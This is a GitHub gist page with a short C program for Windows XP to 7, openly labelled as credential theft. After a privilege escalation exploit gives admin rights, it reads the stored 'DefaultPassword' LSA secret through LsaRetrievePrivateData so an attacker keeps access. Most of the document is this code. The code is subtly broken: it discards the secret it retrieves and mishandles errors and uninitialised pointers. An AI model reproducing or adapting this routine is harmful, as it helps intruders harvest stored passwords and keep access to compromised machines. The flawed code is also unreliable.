Created
October 19, 2017 15:23
-
-
Save danzek/e6331f669b2c9b7de21e1b0df5538995 to your computer and use it in GitHub Desktop.
LsaRetrievePrivateData User Credential Theft on Windows XP-7
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* LsaRetrievePrivateData User Credential Theft on Windows XP-7 | |
* ============================================================ | |
* | |
* Requires admin privileges to run effectively (use privilege escalation | |
* exploit first then use this to get password so you are no longer dependent | |
* on the exploit) | |
* | |
* Seen on reddit: https://www.reddit.com/r/Malware/comments/779v21/til_you_can_maintain_administrative_access/ | |
* Code from pastebin dump: https://pastebin.com/u992uP5e | |
*/ | |
#include <Windows.h> | |
#include <stdio.h> | |
#include <NTSecAPI.h> | |
int wmain(void) | |
{ | |
NTSTATUS Status = 0; | |
DWORD dwError = 0; | |
LSA_UNICODE_STRING uString; | |
PLSA_UNICODE_STRING Data; | |
LSA_OBJECT_ATTRIBUTES Attributes; | |
RtlZeroMemory(&Attributes, sizeof(Attributes)); | |
LSA_HANDLE hHandle; | |
LPCWSTR lpPassword = L"DefaultPassword"; | |
Status = LsaOpenPolicy(NULL, &Attributes, POLICY_ALL_ACCESS, &hHandle); | |
if (Status != ERROR_SUCCESS) | |
goto FAILURE; | |
uString.Buffer = (PWSTR)lpPassword; | |
uString.Length = wcslen(lpPassword) * sizeof(WCHAR); | |
uString.MaximumLength = uString.Length + 1; | |
Status = LsaRetrievePrivateData(hHandle, &uString, &Data); | |
if (Status != ERROR_SUCCESS) | |
goto FAILURE; | |
if(Data) | |
LsaFreeMemory(Data); | |
if (hHandle) | |
LsaClose(hHandle); | |
return ERROR_SUCCESS; | |
FAILURE: | |
dwError = GetLastError(); | |
if (Data) | |
LsaFreeMemory(Data); | |
if (hHandle) | |
LsaClose(hHandle); | |
//do things | |
printf("Operation failed: %ld\r\n", dwError); | |
return dwError; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment